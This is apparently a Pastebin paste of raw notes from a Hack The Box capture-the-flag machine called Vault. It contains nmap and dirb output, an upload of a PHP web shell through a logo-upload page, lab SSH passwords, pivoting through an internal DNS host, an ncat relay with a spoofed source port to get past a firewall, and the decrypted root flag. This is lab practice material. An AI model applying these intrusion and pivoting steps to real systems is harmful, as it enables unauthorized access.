Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:52 MDT
- Nmap scan report for 10.10.10.109
- Host is up (0.15s latency).
- Not shown: 998 closed ports
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
- | 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
- |_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- |_http-server-header: Apache/2.4.18 (Ubuntu)
- |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
- No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
- TCP/IP fingerprint:
- OS:SCAN(V=7.70%E=4%D=11/3%OT=22%CT=1%CU=42739%PV=Y%DS=2%DC=T%G=Y%TM=5BDE0AC
- OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)SEQ
- OS:(SP=100%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%
- OS:TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5
- OS:=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
- OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
- OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
- OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
- OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
- OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
- OS:%T=40%CD=S)
- Network Distance: 2 hops
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 554/tcp)
- HOP RTT ADDRESS
- 1 193.74 ms 10.10.14.1
- 2 105.66 ms 10.10.10.109
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 57.83 seconds
- root@kali:~/HTB/boxes/Vault# nmap -sU 10.10.10.109
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 15:12 MDT
- Nmap scan report for 10.10.10.109
- Host is up (0.14s latency).
- Not shown: 997 closed ports
- PORT STATE SERVICE
- 389/udp open|filtered ldap
- 631/udp open|filtered ipp
- 5353/udp open|filtered zeroconf
- Nmap done: 1 IP address (1 host up) scanned in 1083.23 seconds
- root@kali:~/HTB/boxes/Vault# nmap --script=/usr/share/nmap/scripts/ssh2-enum-algos.nse 10.10.10.109
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:57 MDT
- Nmap scan report for 10.10.10.109
- Host is up (0.14s latency).
- Not shown: 998 closed ports
- PORT STATE SERVICE
- 22/tcp open ssh
- | ssh2-enum-algos:
- | kex_algorithms: (6)
- | curve25519-sha256@libssh.org
- | ecdh-sha2-nistp256
- | ecdh-sha2-nistp384
- | ecdh-sha2-nistp521
- | diffie-hellman-group-exchange-sha256
- | diffie-hellman-group14-sha1
- | server_host_key_algorithms: (5)
- | ssh-rsa
- | rsa-sha2-512
- | rsa-sha2-256
- | ecdsa-sha2-nistp256
- | ssh-ed25519
- | encryption_algorithms: (6)
- | chacha20-poly1305@openssh.com
- | aes128-ctr
- | aes192-ctr
- | aes256-ctr
- | aes128-gcm@openssh.com
- | aes256-gcm@openssh.com
- | mac_algorithms: (10)
- | umac-64-etm@openssh.com
- | umac-128-etm@openssh.com
- | hmac-sha2-256-etm@openssh.com
- | hmac-sha2-512-etm@openssh.com
- | hmac-sha1-etm@openssh.com
- | umac-64@openssh.com
- | umac-128@openssh.com
- | hmac-sha2-256
- | hmac-sha2-512
- | hmac-sha1
- | compression_algorithms: (2)
- | none
- |_ zlib@openssh.com
- 80/tcp open http
- Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
- -----------------
- DIRB v2.22
- By The Dark Raver
- -----------------
- START_TIME: Sat Nov 3 15:05:13 2018
- URL_BASE: http://10.10.10.109/sparklays/
- WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
- -----------------
- GENERATED WORDS: 4612
- ---- Scanning URL: http://10.10.10.109/sparklays/ ----
- + http://10.10.10.109/sparklays/admin.php (CODE:200|SIZE:615)
- ==> DIRECTORY: http://10.10.10.109/sparklays/design/
- ---- Entering directory: http://10.10.10.109/sparklays/design/ ----
- ==> DIRECTORY: http://10.10.10.109/sparklays/design/uploads/
- ---- Entering directory: http://10.10.10.109/sparklays/design/uploads/ ----
- -----------------
- END_TIME: Sat Nov 3 15:36:08 2018
- DOWNLOADED: 13836 - FOUND: 1
- LOGIN PAGE
- http://10.10.10.109/sparklays/admin.php
- UPLOAD FILES
- http://10.10.10.109/sparklays/design/changelogo.php
- UPLOADED POWNY@SHELL TO GAIN WEB BROWSER SHELL AND FOUND SSH PASSWORD IN DAVE DESKTOP FOLDER
- ssh dave@10.10.10.109
- Dav3therav3123
- FOUND FILE ENTITLED KEY THAT CONTAINS
- itscominghome
- ACCESS WEBSITE FROM SERVER
- ssh -D 8080 dave@10.10.10.109
- MORE CREDENTIALS FOUND
- root@DNS: var www DNS desktop# cat ssh
- dave
- dav3gerous567
- SSH INTO DNS SERVER
- ssh dave@192.168.122.4
- dav3gerous567
- BECOME ROOT
- sudo su -
- dav3gerous567
- TRACEROUTE (using port 1723/tcp)
- HOP RTT ADDRESS
- 1 0.82 ms 192.168.5.1
- Nmap scan report for Vault (192.168.5.2)
- Host is up (0.0021s latency).
- Not shown: 998 filtered ports
- PORT STATE SERVICE VERSION
- 53/tcp closed domain
- 4444/tcp closed krb524
- Too many fingerprints match this host to give specific OS details
- Network Distance: 2 hops
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 0.98 ms 192.168.122.5
- 2 1.86 ms Vault (192.168.5.2)
- HOW TO +++++====================================================================================================
- SEE WHAT PORTS ARE OPEN ON VAULT
- cat /var/log/auth.log | grep -a 192.168.5.2 you will see it uses port 4444 for ssh
- SET UP A LISTENER
- ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
- Check port is open on
- /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
- SSH IN
- ssh dave@localhost -p 5555
- ps aux | grep ncat
- port 5555 its being used by someone else
- dave@vault:~$ ls
- root.txt.gpg
- SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
- root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
- [1] 14627
- COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
- root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
- dave@localhost's password:
- root.txt.gpg 100% 629 0.6KB/s 00:00
- [1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
- root@DNS:~# cd /tmp
- root@DNS:/tmp# ls
- root.txt.gpg test.txt
- Connection to 192.168.122.4 closed.
- COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
- dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
- dave@192.168.122.4's password:
- root.txt.gpg 100% 629 0.6KB/s 00:00
- dave@ubuntu:~$ cd /dev/shm
- DECRYPT THE GPG ROOT FILE
- dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg
- You need a passphrase to unlock the secret key for
- user: "david <dave@david.com>"
- 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
- gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
- "david <dave@david.com>"
- ROOT FILE
- ca468370b91d1f5906e31093d9bfe819
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement